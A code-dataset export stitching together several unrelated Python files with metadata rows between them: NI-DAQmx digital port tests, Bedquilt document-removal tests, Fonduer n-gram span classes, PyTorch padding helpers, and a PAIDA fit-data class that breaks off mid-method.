for _ in range(number_of_samples)] for do_port in do_ports],
dtype=numpy.uint16)
writer = DigitalMultiChannelWriter(task.out_stream)
reader = DigitalMultiChannelReader(task.in_stream)
task.start()
writer.write_many_sample_port_uint16(values_to_test)
time.sleep(0.001)
# Since we're writing to and reading from ONLY the digital
# output lines, we can't use sample clocks to correlate the
# read and write sampling times. Thus, we essentially read
# the last value written multiple times.
values_read = numpy.zeros(
(number_of_channels, number_of_samples), dtype=numpy.uint16)
reader.read_many_sample_port_uint16(
values_read, number_of_samples_per_channel=number_of_samples)
expected_values = [
[values_to_test[i, -1] for _ in range(number_of_samples)]
for i in range(number_of_channels)]
numpy.testing.assert_array_equal(values_read, expected_values)
@pytest.mark.skipif(
len([d.do_port_width <= 32 for d in x_series_device().do_ports]) < 2,
reason="Requires 2 digital ports with at most 32 lines.")
@pytest.mark.parametrize('seed', [generate_random_seed()])
def test_many_sample_port_uint32(self, x_series_device, seed):
# Reset the pseudorandom number generator with seed.
random.seed(seed)
number_of_samples = random.randint(2, 20)
all_ports = [d for d in x_series_device.do_ports if
d.do_port_width <= 32]
number_of_channels = random.randint(2, len(all_ports))
do_ports = random.sample(all_ports, number_of_channels)
with nidaqmx.Task() as task:
for do_port in do_ports:
task.do_channels.add_do_chan(
do_port.name,
line_grouping=LineGrouping.CHAN_FOR_ALL_LINES)
# Generate random values to test.
values_to_test = numpy.array(
[[int(random.getrandbits(do_port.do_port_width))
for _ in range(number_of_samples)] for do_port in do_ports],
dtype=numpy.uint32)
writer = DigitalMultiChannelWriter(task.out_stream)
reader = DigitalMultiChannelReader(task.in_stream)
task.start()
writer.write_many_sample_port_uint32(values_to_test)
time.sleep(0.001)
# Since we're writing to and reading from ONLY the digital
# output lines, we can't use sample clocks to correlate the
# read and write sampling times. Thus, we essentially read
# the last value written multiple times.
values_read = numpy.zeros(
(number_of_channels, number_of_samples), dtype=numpy.uint32)
reader.read_many_sample_port_uint32(
values_read, number_of_samples_per_channel=number_of_samples)
expected_values = [
[values_to_test[i, -1] for _ in range(number_of_samples)]
for i in range(number_of_channels)]
numpy.testing.assert_array_equal(values_read, expected_values)
| 42.279294
| 78
| 0.648709
| 3,393
| 26,340
| 4.728264
| 0.046272
| 0.026928
| 0.047871
| 0.028985
| 0.955183
| 0.952877
| 0.939974
| 0.931933
| 0.929627
| 0.926323
| 0
| 0.013697
| 0.273804
| 26,340
| 622
| 79
| 42.347267
| 0.825021
| 0.116363
| 0
| 0.825243
| 0
| 0
| 0.02616
| 0
| 0
| 0
| 0
| 0
| 0.038835
| 1
| 0.038835
| false
| 0
| 0.029126
| 0
| 0.072816
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
992bce62bae104c54b56a1b18bb10eb1fb319093
| 12,413
|
py
|
Python
|
test/test_remove_documents.py
|
ShaneKilkelly/bedquilt
|
beaee513a015ed0dd633b738517b33eb7c4c42a3
|
[
"MIT"
] | 288
|
2015-04-20T18:14:39.000Z
|
2021-10-30T01:35:44.000Z
|
test/test_remove_documents.py
|
ShaneKilkelly/bedquilt
|
beaee513a015ed0dd633b738517b33eb7c4c42a3
|
[
"MIT"
] | 21
|
2015-04-13T12:48:40.000Z
|
2017-05-27T12:41:10.000Z
|
test/test_remove_documents.py
|
ShaneKilkelly/bedquilt
|
beaee513a015ed0dd633b738517b33eb7c4c42a3
|
[
"MIT"
] | 19
|
2015-11-03T09:25:00.000Z
|
2021-05-01T00:28:02.000Z
|
import testutils
import json
import string
import psycopg2
class TestRemoveDocumnts(testutils.BedquiltTestCase):
def test_remove_on_empty_collection(self):
self.cur.execute("""
select bq_create_collection('people');
""")
_ = self.cur.fetchall()
self.cur.execute("""
select bq_remove('people', '{"age": 22}')
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(0,)
])
def test_remove_one_on_empty_collection(self):
self.cur.execute("""
select bq_create_collection('people');
""")
_ = self.cur.fetchall()
self.cur.execute("""
select bq_remove_one('people', '{"age": 22}')
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(0,)
])
def test_remove_on_non_existant_collection(self):
self.cur.execute("""
select bq_remove('people', '{"age": 22}')
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(0,)
])
def test_remove_one_on_non_existant_collection(self):
self.cur.execute("""
select bq_remove_one('people', '{"age": 22}')
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(0,)
])
def test_remove_hitting_single_document(self):
sarah = {'_id': "sarah@example.com",
'name': "Sarah",
'city': "Glasgow",
'age': 34,
'likes': ['icecream', 'cats']}
mike = {'_id': "mike@example.com",
'name': "Mike",
'city': "Edinburgh",
'age': 32,
'likes': ['cats', 'crochet']}
jill = {'_id': "jill@example.com",
'name': "Jill",
'city': "Glasgow",
'age': 32,
'likes': ['code', 'crochet']}
darren = {'_id': "darren@example.com",
'name': "Darren",
'city': "Manchester"}
self._insert('people', sarah)
self._insert('people', mike)
self._insert('people', jill)
self._insert('people', darren)
self.cur.execute("""
select bq_remove('people', '{"age": 34}');
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(1,)
])
self.cur.execute("""
select bq_find('people', '{}');
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(mike,),
(jill,),
(darren,)
])
def test_remove_hitting_many_document(self):
sarah = {'_id': "sarah@example.com",
'name': "Sarah",
'city': "Glasgow",
'age': 34,
'likes': ['icecream', 'cats']}
mike = {'_id': "mike@example.com",
'name': "Mike",
'city': "Edinburgh",
'age': 32,
'likes': ['cats', 'crochet']}
jill = {'_id': "jill@example.com",
'name': "Jill",
'city': "Glasgow",
'age': 32,
'likes': ['code', 'crochet']}
darren = {'_id': "darren@example.com",
'name': "Darren",
'city': "Manchester"}
self._insert('people', sarah)
self._insert('people', mike)
self._insert('people', jill)
self._insert('people', darren)
self.cur.execute("""
select bq_remove('people', '{"age": 32}');
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(2,)
])
self.cur.execute("""
select bq_find('people', '{}');
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(sarah,),
(darren,)
])
def test_remove_one_documents(self):
sarah = {'_id': "sarah@example.com",
'name': "Sarah",
'city': "Glasgow",
'age': 34,
'likes': ['icecream', 'cats']}
mike = {'_id': "mike@example.com",
'name': "Mike",
'city': "Edinburgh",
'age': 32,
'likes': ['cats', 'crochet']}
jill = {'_id': "jill@example.com",
'name': "Jill",
'city': "Glasgow",
'age': 32,
'likes': ['code', 'crochet']}
darren = {'_id': "darren@example.com",
'name': "Darren",
'city': "Manchester"}
self._insert('people', sarah)
self._insert('people', mike)
self._insert('people', jill)
self._insert('people', darren)
# remove_one a single document matching a wide query
self.cur.execute("""
select bq_remove_one('people', '{"age": 32}');
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(1,)
])
self.cur.execute("""
select bq_find('people', '{}');
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(sarah,),
(jill,),
(darren,)
])
# remove_one a single document matching a specific query
self.cur.execute("""
select bq_remove_one('people', '{"name": "Darren"}');
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(1,)
])
self.cur.execute("""
select bq_find('people', '{}');
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(sarah,),
(jill,)
])
# remove_one a single document matching an _id
self.cur.execute("""
select bq_remove_one('people', '{"_id": "jill@example.com"}');
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(1,)
])
self.cur.execute("""
select bq_find('people', '{}');
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(sarah,)
])
def test_remove_one_by_id_on_non_existant_collection(self):
self.cur.execute("""
select bq_remove_one_by_id('people', 'jill@example.com');
""")
result = self.cur.fetchall()
self.assertEqual(result, [ (0,) ])
def test_remove_one_by_id_on_empty_collection(self):
self.cur.execute("""
select bq_create_collection('people');
""")
_ = self.cur.fetchall()
self.cur.execute("""
select bq_remove_one_by_id('people', 'jill@example.com');
""")
result = self.cur.fetchall()
self.assertEqual(result, [ (0,) ])
def test_remove_one_by_id(self):
sarah = {'_id': "sarah@example.com",
'name': "Sarah",
'city': "Glasgow",
'age': 34,
'likes': ['icecream', 'cats']}
mike = {'_id': "mike@example.com",
'name': "Mike",
'city': "Edinburgh",
'age': 32,
'likes': ['cats', 'crochet']}
jill = {'_id': "jill@example.com",
'name': "Jill",
'city': "Glasgow",
'age': 32,
'likes': ['code', 'crochet']}
darren = {'_id': "darren@example.com",
'name': "Darren",
'city': "Manchester"}
self._insert('people', sarah)
self._insert('people', mike)
self._insert('people', jill)
self._insert('people', darren)
# remove an existing document
self.cur.execute("""
select bq_remove_one_by_id('people', 'jill@example.com')
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(1,)
])
self.cur.execute("""
select bq_find('people', '{}');
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(sarah,),
(mike,),
(darren,)
])
# remove a document which is not in collection
self.cur.execute("""
select bq_remove_one_by_id('people', 'xxxxx')
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(0,)
])
self.cur.execute("""
select bq_find('people', '{}');
""")
result = self.cur.fetchall()
self.assertEqual(result,
[
(sarah,),
(mike,),
(darren,)
])
def test_remove_many_by_ids_on_non_existant_collection(self):
self.cur.execute("""
select bq_remove_many_by_ids('people', '["one", "three"]');
""")
result = self.cur.fetchall()
self.assertEqual(result, [ (0,) ])
def test_remove_many_by_ids_on_empty_collection(self):
self.cur.execute("""
select bq_create_collection('people');
""")
_ = self.cur.fetchall()
self.cur.execute("""
select bq_remove_many_by_ids('people', '["one", "three"]');
""")
result = self.cur.fetchall()
self.assertEqual(result, [ (0,) ])
def test_remove_many_by_ids(self):
sarah = {'_id': "sarah@example.com",
'name': "Sarah",
'city': "Glasgow",
'age': 34,
'likes': ['icecream', 'cats']}
mike = {'_id': "mike@example.com",
'name': "Mike",
'city': "Edinburgh",
'age': 32,
'likes': ['cats', 'crochet']}
jill = {'_id': "jill@example.com",
'name': "Jill",
'city': "Glasgow",
'age': 32,
'likes': ['code', 'crochet']}
darren = {'_id': "darren@example.com",
'name': "Darren",
'city': "Manchester"}
self._insert('people', sarah)
self._insert('people', mike)
self._insert('people', jill)
self._insert('people', darren)
self.cur.execute("""
select bq_remove_many_by_ids('people', '["nope", "nope_two"]')
""")
result = self.cur.fetchall()
self.assertEqual(result, [ (0,) ])
self.cur.execute("""
select bq_count('people', '{}')
""")
result = self.cur.fetchall()
self.assertEqual(result, [ (4,) ])
self.cur.execute("""
select bq_remove_many_by_ids('people', '["darren@example.com", "mike@example.com"]')
""")
result = self.cur.fetchall()
self.assertEqual(result, [ (2,) ])
self.cur.execute("""
select bq_count('people', '{}')
""")
result = self.cur.fetchall()
self.assertEqual(result, [ (2,) ])
self.cur.execute("""
select bq_find('people', '{}')
""")
result = self.cur.fetchall()
self.assertEqual(
map(lambda r: r[0]['_id'], result),
['sarah@example.com', 'jill@example.com'])
| 30.42402
| 92
| 0.418916
| 1,035
| 12,413
| 4.846377
| 0.077295
| 0.086523
| 0.086523
| 0.123604
| 0.927233
| 0.927233
| 0.920853
| 0.91248
| 0.891946
| 0.874402
| 0
| 0.009115
| 0.425522
| 12,413
| 407
| 93
| 30.498772
| 0.694293
| 0.017965
| 0
| 0.846377
| 0
| 0
| 0.26067
| 0.044731
| 0
| 0
| 0
| 0
| 0.078261
| 1
| 0.037681
| false
| 0
| 0.011594
| 0
| 0.052174
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
993d9997a490057a2a0060e5e439dc1789e8136a
| 3,496
|
py
|
Python
|
tutorials/organic_synthesis_figures/organic_spaces.py
|
leewaymay/839_fonduer
|
1692f018ef113d88dca4ede69cc2ead55b7b1003
|
[
"Apache-2.0"
] | 1
|
2018-05-31T02:44:00.000Z
|
2018-05-31T02:44:00.000Z
|
tutorials/organic_synthesis_figures/organic_spaces.py
|
leewaymay/839_fonduer
|
1692f018ef113d88dca4ede69cc2ead55b7b1003
|
[
"Apache-2.0"
] | null | null | null |
tutorials/organic_synthesis_figures/organic_spaces.py
|
leewaymay/839_fonduer
|
1692f018ef113d88dca4ede69cc2ead55b7b1003
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import print_function
from builtins import chr
from builtins import str
from builtins import range
from difflib import SequenceMatcher
import re
from fonduer.candidates import OmniNgrams
from fonduer.models import TemporaryImplicitSpan
class OmniNgramsProd(OmniNgrams):
def __init__(self,
parts_by_doc=None,
n_max=1,
expand=False,
split_tokens=' '):
""":param parts_by_doc: a dictionary d where d[document_name.upper()] = [partA, partB, ...]"""
OmniNgrams.__init__(self, n_max=n_max, split_tokens=' ')
self.parts_by_doc = parts_by_doc
self.expander = lambda x: [x]
def apply(self, session, context):
for ts in OmniNgrams.apply(self, session, context):
value = ts.get_span()
yield TemporaryImplicitSpan(
sentence=ts.sentence,
char_start=ts.char_start,
char_end=ts.char_end,
expander_key=u'prod_expander',
position=0,
text=value,
words=[value],
lemmas=[value],
pos_tags=[ts.get_attrib_tokens('pos_tags')[-1]],
ner_tags=[ts.get_attrib_tokens('ner_tags')[-1]],
dep_parents=[ts.get_attrib_tokens('dep_parents')[-1]],
dep_labels=[ts.get_attrib_tokens('dep_labels')[-1]],
page=[ts.get_attrib_tokens('page')[-1]]
if ts.sentence.is_visual() else [None],
top=[ts.get_attrib_tokens('top')[-1]]
if ts.sentence.is_visual() else [None],
left=[ts.get_attrib_tokens('left')[-1]]
if ts.sentence.is_visual() else [None],
bottom=[ts.get_attrib_tokens('bottom')[-1]]
if ts.sentence.is_visual() else [None],
right=[ts.get_attrib_tokens('right')[-1]]
if ts.sentence.is_visual() else [None],
meta=None)
# Added by Wei Li
class OmniNgramsOrganic(OmniNgrams):
# def __init__(self, n_max=2, split_tokens=None):
# OmniNgrams.__init__(self, n_max=n_max, split_tokens=None)
def apply(self, session, context):
for ts in OmniNgrams.apply(self, session, context):
value = ts.get_span()
yield TemporaryImplicitSpan(
sentence=ts.sentence,
char_start=ts.char_start,
char_end=ts.char_end,
expander_key=u'N/A',
position=0,
text=value,
words=[value],
lemmas=[value],
pos_tags=[ts.get_attrib_tokens('pos_tags')[-1]],
ner_tags=[ts.get_attrib_tokens('ner_tags')[-1]],
dep_parents=[ts.get_attrib_tokens('dep_parents')[-1]],
dep_labels=[ts.get_attrib_tokens('dep_labels')[-1]],
page=[ts.get_attrib_tokens('page')[-1]]
if ts.sentence.is_visual() else [None],
top=[ts.get_attrib_tokens('top')[-1]]
if ts.sentence.is_visual() else [None],
left=[ts.get_attrib_tokens('left')[-1]]
if ts.sentence.is_visual() else [None],
bottom=[ts.get_attrib_tokens('bottom')[-1]]
if ts.sentence.is_visual() else [None],
right=[ts.get_attrib_tokens('right')[-1]]
if ts.sentence.is_visual() else [None],
meta=None)
| 42.120482
| 102
| 0.556064
| 417
| 3,496
| 4.386091
| 0.215827
| 0.054675
| 0.108256
| 0.167305
| 0.730454
| 0.730454
| 0.730454
| 0.730454
| 0.730454
| 0.689995
| 0
| 0.009236
| 0.31865
| 3,496
| 82
| 103
| 42.634146
| 0.758606
| 0.061499
| 0
| 0.722222
| 0
| 0
| 0.041552
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0
| 0.111111
| 0
| 0.180556
| 0.013889
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
995b110980d3af59c9919d34412586d5ee92b8b4
| 1,565
|
py
|
Python
|
src/layers/padding.py
|
uw-bionlp/ards
|
e9fc27f7034cc6b54f0ccdba4a58377948cf0258
|
[
"BSD-3-Clause"
] | null | null | null |
src/layers/padding.py
|
uw-bionlp/ards
|
e9fc27f7034cc6b54f0ccdba4a58377948cf0258
|
[
"BSD-3-Clause"
] | null | null | null |
src/layers/padding.py
|
uw-bionlp/ards
|
e9fc27f7034cc6b54f0ccdba4a58377948cf0258
|
[
"BSD-3-Clause"
] | null | null | null |
import torch
import logging
from torch.nn import ConstantPad3d, ConstantPad2d, ConstantPad1d
def pad3D(x, max_seq_count):
'''
pad first dimension (sequence count) of documents
'''
# current sentence count
seq_count = x.shape[0]
# append zeros, if sequence count too low
if seq_count < max_seq_count:
padding_back = max_seq_count - seq_count
pad = ConstantPad3d((0, 0, 0, 0, 0, padding_back), 0)
x = pad(x)
# truncate document
elif seq_count > max_seq_count:
x = x[:max_seq_count]
return x
def pad2D(x, max_seq_count):
'''
pad first dimension (sequence count) of documents
'''
# current sentence count
seq_count = x.shape[0]
# append zeros, if sequence count too low
if seq_count < max_seq_count:
padding_back = max_seq_count - seq_count
pad = ConstantPad2d((0, 0, 0, padding_back), 0)
x = pad(x)
# truncate document
elif seq_count > max_seq_count:
x = x[:max_seq_count]
return x
def pad1D(x, max_seq_count):
'''
pad first dimension (sequence count) of documents
'''
# current sentence count
seq_count = x.shape[0]
# append zeros, if sequence count too low
if seq_count < max_seq_count:
padding_back = max_seq_count - seq_count
pad = ConstantPad1d((0, padding_back), 0)
x = pad(x)
# truncate document
elif seq_count > max_seq_count:
x = x[:max_seq_count]
return x
| 23.014706
| 65
| 0.607029
| 212
| 1,565
| 4.254717
| 0.174528
| 0.239468
| 0.182927
| 0.079823
| 0.845898
| 0.845898
| 0.845898
| 0.845898
| 0.845898
| 0.845898
| 0
| 0.022243
| 0.310543
| 1,565
| 67
| 66
| 23.358209
| 0.813716
| 0.251118
| 0
| 0.7
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.1
| 0
| 0.3
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
41d134ec886e3474471ede005be82ee6c61fb0ef
| 16,652
|
py
|
Python
|
paida-3.2.1_2.10.1/paida/paida_core/IFitData.py
|
AshleyChraya/HubbleConstant-ConstraintsForVCG
|
634c15d296147ec1cdc3c92af1fbbfeb17844586
|
[
"MIT"
] | null | null | null |
paida-3.2.1_2.10.1/paida/paida_core/IFitData.py
|
AshleyChraya/HubbleConstant-ConstraintsForVCG
|
634c15d296147ec1cdc3c92af1fbbfeb17844586
|
[
"MIT"
] | null | null | null |
paida-3.2.1_2.10.1/paida/paida_core/IFitData.py
|
AshleyChraya/HubbleConstant-ConstraintsForVCG
|
634c15d296147ec1cdc3c92af1fbbfeb17844586
|
[
"MIT"
] | null | null | null |
from paida.paida_core.PAbsorber import *
from paida.paida_core.IRangeSet import *
from paida.paida_core.PExceptions import *
from paida.paida_core.IHistogram1D import *
from paida.paida_core.IHistogram2D import *
from paida.paida_core.IHistogram3D import *
from paida.paida_core.ICloud1D import *
from paida.paida_core.ICloud2D import *
from paida.paida_core.ICloud3D import *
from paida.paida_core.IProfile1D import *
from paida.paida_core.IProfile2D import *
from paida.paida_core.IDataPointSet import *
from paida.paida_core.ITuple import *
from paida.paida_core.IEvaluator import *
import paida.paida_core.PTypes as PTypes
import types
class IFitData:
def __init__(self):
self._connection = []
self._range = []
self._binned = None
self._dataDescription = ''
def create1DConnection(self, data1, data2 = None, data3 = None):
centers = []
weights = []
errorsP = []
errorsM = []
if isinstance(data1, IHistogram1D) and (data2 == None) and (data3 == None):
self._binned = True
histogram = data1
xAxis = histogram.axis()
for xBinNumber in range(xAxis.bins()):
weight = histogram.binHeight(xBinNumber)
if weight == 0.0:
xCenter = (xAxis.binLowerEdge(xBinNumber) + xAxis.binUpperEdge(xBinNumber)) / 2.0
else:
xCenter = histogram.binMean(xBinNumber)
centers.append([xCenter])
weights.append(weight)
error = histogram._binError2(xBinNumber)
errorsP.append(error)
errorsM.append(error)
elif isinstance(data1, ICloud1D) and (data2 == None) and (data3 == None):
self._binned = False
cloud = data1
for entryNumber in range(cloud.entries()):
xCenter = cloud.value(entryNumber)
centers.append([xCenter])
weights.append(None)
errorsP.append(None)
errorsM.append(None)
elif isinstance(data1, IProfile1D) and (data2 == None) and (data3 == None):
self._binned = True
profile = data1
xAxis = profile.axis()
for xBinNumber in range(xAxis.bins()):
weight = profile.binHeight(xBinNumber)
if weight == 0.0:
xCenter = (xAxis.binLowerEdge(xBinNumber) + xAxis.binUpperEdge(xBinNumber)) / 2.0
else:
xCenter = profile.binMean(xBinNumber)
centers.append([xCenter])
weights.append(weight)
error = profile._binError2(xBinNumber)
errorsP.append(error)
errorsM.append(error)
elif isinstance(data1, IDataPointSet) and isinstance(data2, types.IntType) and isinstance(data3, types.IntType):
self._binned = True
dataPointSet = data1
xIndex = data2
valIndex = data3
for offset in range(dataPointSet.size()):
dataPoint = dataPointSet.point(offset)
x = dataPoint.coordinate(xIndex)
y = dataPoint.coordinate(valIndex)
centers.append([x.value()])
weights.append(y.value())
errorsP.append(y.errorPlus()**2)
errorsM.append(y.errorMinus()**2)
else:
raise TypeError('Invalid arguments.')
self._connection = [centers, weights, errorsP, errorsM]
self._range.append(IRangeSet())
def create2DConnection(self, data1, data2 = None, data3 = None, data4 = None):
centers = []
weights = []
errorsP = []
errorsM = []
if isinstance(data1, IHistogram2D) and (data2 == None) and (data3 == None) and (data4 == None):
self._binned = True
histogram = data1
xAxis = histogram.xAxis()
yAxis = histogram.yAxis()
for xBinNumber in range(xAxis.bins()):
for yBinNumber in range(yAxis.bins()):
weight = histogram.binHeight(xBinNumber, yBinNumber)
if weight == 0.0:
xCenter = (xAxis.binLowerEdge(xBinNumber) + xAxis.binUpperEdge(xBinNumber)) / 2.0
yCenter = (yAxis.binLowerEdge(yBinNumber) + yAxis.binUpperEdge(yBinNumber)) / 2.0
else:
xCenter = histogram.binMeanX(xBinNumber, yBinNumber)
yCenter = histogram.binMeanY(xBinNumber, yBinNumber)
centers.append([xCenter, yCenter])
weights.append(weight)
error = histogram._binError2(xBinNumber, yBinNumber)
errorsP.append(error)
errorsM.append(error)
elif isinstance(data1, IHistogram2D) and isinstance(data2, types.IntType) and isinstance(data3, types.IntType) and (data4 == None):
self._binned = True
histogram = data1
xIndex = data2
yIndex = data3
xAxis = histogram.xAxis()
yAxis = histogram.yAxis()
for xBinNumber in range(xAxis.bins()):
for yBinNumber in range(yAxis.bins()):
weight = histogram.binHeight(xBinNumber, yBinNumber)
if weight == 0.0:
xCenter = (xAxis.binLowerEdge(xBinNumber) + xAxis.binUpperEdge(xBinNumber)) / 2.0
yCenter = (yAxis.binLowerEdge(yBinNumber) + yAxis.binUpperEdge(yBinNumber)) / 2.0
else:
xCenter = histogram.binMeanX(xBinNumber, yBinNumber)
yCenter = histogram.binMeanY(xBinNumber, yBinNumber)
center = [None, None]
center[xIndex] = xCenter
center[yIndex] = yCenter
centers.append(center)
weights.append(weight)
error = histogram._binError2(xBinNumber, yBinNumber)
errorsP.append(error)
errorsM.append(error)
elif isinstance(data1, ICloud2D) and (data2 == None) and (data3 == None) and (data4 == None):
self._binned = False
cloud = data1
for entryNumber in range(cloud.entries()):
xCenter = cloud.valueX(entryNumber)
yCenter = cloud.valueY(entryNumber)
centers.append([xCenter, yCenter])
weights.append(None)
errorsP.append(None)
errorsM.append(None)
elif isinstance(data1, ICloud2D) and isinstance(data2, types.IntType) and isinstance(data3, types.IntType) and (data4 == None):
self._binned = False
cloud = data1
xIndex = data2
yIndex = data3
for entryNumber in range(cloud.entries()):
center = [None, None]
center[xIndex] = cloud.valueX(entryNumber)
center[yIndex] = cloud.valueY(entryNumber)
centers.append(center)
weights.append(None)
errorsP.append(None)
errorsM.append(None)
elif isinstance(data1, IProfile2D) and (data2 == None) and (data3 == None) and (data4 == None):
self._binned = True
profile = data1
xAxis = profile.xAxis()
yAxis = profile.yAxis()
for xBinNumber in range(xAxis.bins()):
for yBinNumber in range(yAxis.bins()):
weight = profile.binHeight(xBinNumber, yBinNumber)
if weight == 0.0:
xCenter = (xAxis.binLowerEdge(xBinNumber) + xAxis.binUpperEdge(xBinNumber)) / 2.0
yCenter = (yAxis.binLowerEdge(yBinNumber) + yAxis.binUpperEdge(yBinNumber)) / 2.0
else:
xCenter = profile.binMeanX(xBinNumber, yBinNumber)
yCenter = profile.binMeanY(xBinNumber, yBinNumber)
centers.append([xCenter, yCenter])
weights.append(weight)
error = profile._binError2(xBinNumber, yBinNumber)
errorsP.append(error)
errorsM.append(error)
elif isinstance(data1, IProfile2D) and isinstance(data2, types.IntType) and isinstance(data3, types.IntType) and (data4 == None):
self._binned = True
profile = data1
xIndex = data2
yIndex = data3
xAxis = profile.xAxis()
yAxis = profile.yAxis()
for xBinNumber in range(xAxis.bins()):
for yBinNumber in range(yAxis.bins()):
weight = profile.binHeight(xBinNumber, yBinNumber)
if weight == 0.0:
xCenter = (xAxis.binLowerEdge(xBinNumber) + xAxis.binUpperEdge(xBinNumber)) / 2.0
yCenter = (yAxis.binLowerEdge(yBinNumber) + yAxis.binUpperEdge(yBinNumber)) / 2.0
else:
xCenter = profile.binMeanX(xBinNumber, yBinNumber)
yCenter = profile.binMeanY(xBinNumber, yBinNumber)
center = [None, None]
center[xIndex] = xCenter
center[yIndex] = yCenter
centers.append(center)
weights.append(weight)
error = profile._binError2(xBinNumber, yBinNumber)
errorsP.append(error)
errorsM.append(error)
elif isinstance(data1, IDataPointSet) and isinstance(data2, types.IntType) and isinstance(data3, types.IntType) and isinstance(data4, types.IntType):
self._binned = True
dataPointSet = data1
xIndex = data2
yIndex = data3
valIndex = data4
for offset in range(dataPointSet.size()):
dataPoint = dataPointSet.point(offset)
x = dataPoint.coordinate(xIndex)
y = dataPoint.coordinate(yIndex)
z = dataPoint.coordinate(valIndex)
centers.append([x.value(), y.value()])
weights.append(z.value())
errorsP.append(z.errorPlus()**2)
errorsM.append(z.errorMinus()**2)
else:
raise TypeError('Invalid arguments.')
self._connection = [centers, weights, errorsP, errorsM]
self._range.append(IRangeSet())
self._range.append(IRangeSet())
def create3DConnection(self, data1, data2 = None, data3 = None, data4 = None, data5 = None):
centers = []
weights = []
errorsP = []
errorsM = []
if isinstance(data1, IHistogram3D) and (data2 == None) and (data3 == None) and (data4 == None) and (data5 == None):
self._binned = True
histogram = data1
xAxis = histogram.xAxis()
yAxis = histogram.yAxis()
zAxis = histogram.zAxis()
for xBinNumber in range(xAxis.bins()):
for yBinNumber in range(yAxis.bins()):
for zBinNumber in range(zAxis.bins()):
weight = histogram.binHeight(xBinNumber, yBinNumber, zBinNumber)
if weight == 0.0:
xCenter = (xAxis.binLowerEdge(xBinNumber) + xAxis.binUpperEdge(xBinNumber)) / 2.0
yCenter = (yAxis.binLowerEdge(yBinNumber) + yAxis.binUpperEdge(yBinNumber)) / 2.0
zCenter = (zAxis.binLowerEdge(zBinNumber) + zAxis.binUpperEdge(zBinNumber)) / 2.0
else:
xCenter = histogram.binMeanX(xBinNumber, yBinNumber, zBinNumber)
yCenter = histogram.binMeanY(xBinNumber, yBinNumber, zBinNumber)
zCenter = histogram.binMeanZ(xBinNumber, yBinNumber, zBinNumber)
centers.append([xCenter, yCenter, zCenter])
weights.append(weight)
error = histogram._binError2(xBinNumber, yBinNumber, zBinNumber)
errorsP.append(error)
errorsM.append(error)
elif isinstance(data1, IHistogram3D) and isinstance(data2, types.IntType) and isinstance(data3, types.IntType) and isinstance(data4, types.IntType) and (data5 == None):
self._binned = True
histogram = data1
xIndex = data2
yIndex = data3
zIndex = data4
xAxis = histogram.xAxis()
yAxis = histogram.yAxis()
zAxis = histogram.zAxis()
for xBinNumber in range(xAxis.bins()):
for yBinNumber in range(yAxis.bins()):
for zBinNumber in range(zAxis.bins()):
weight = histogram.binHeight(xBinNumber, yBinNumber, zBinNumber)
if weight == 0.0:
xCenter = (xAxis.binLowerEdge(xBinNumber) + xAxis.binUpperEdge(xBinNumber)) / 2.0
yCenter = (yAxis.binLowerEdge(yBinNumber) + yAxis.binUpperEdge(yBinNumber)) / 2.0
zCenter = (zAxis.binLowerEdge(zBinNumber) + zAxis.binUpperEdge(zBinNumber)) / 2.0
else:
xCenter = histogram.binMeanX(xBinNumber, yBinNumber, zBinNumber)
yCenter = histogram.binMeanY(xBinNumber, yBinNumber, zBinNumber)
zCenter = histogram.binMeanZ(xBinNumber, yBinNumber, zBinNumber)
center = [None, None, None]
center[xIndex] = xCenter
center[yIndex] = yCenter
center[zIndex] = zCenter
centers.append(center)
weights.append(weight)
error = histogram._binError2(xBinNumber, yBinNumber, zBinNumber)
errorsP.append(error)
errorsM.append(error)
elif isinstance(data1, ICloud3D) and (data2 == None) and (data3 == None) and (data4 == None) and (data5 == None):
self._binned = False
cloud = data1
for entryNumber in range(cloud.entries()):
xCenter = cloud.valueX(entryNumber)
yCenter = cloud.valueY(entryNumber)
zCenter = cloud.valueZ(entryNumber)
centers.append([xCenter, yCenter, zCenter])
weights.append(None)
errorsP.append(None)
errorsM.append(None)
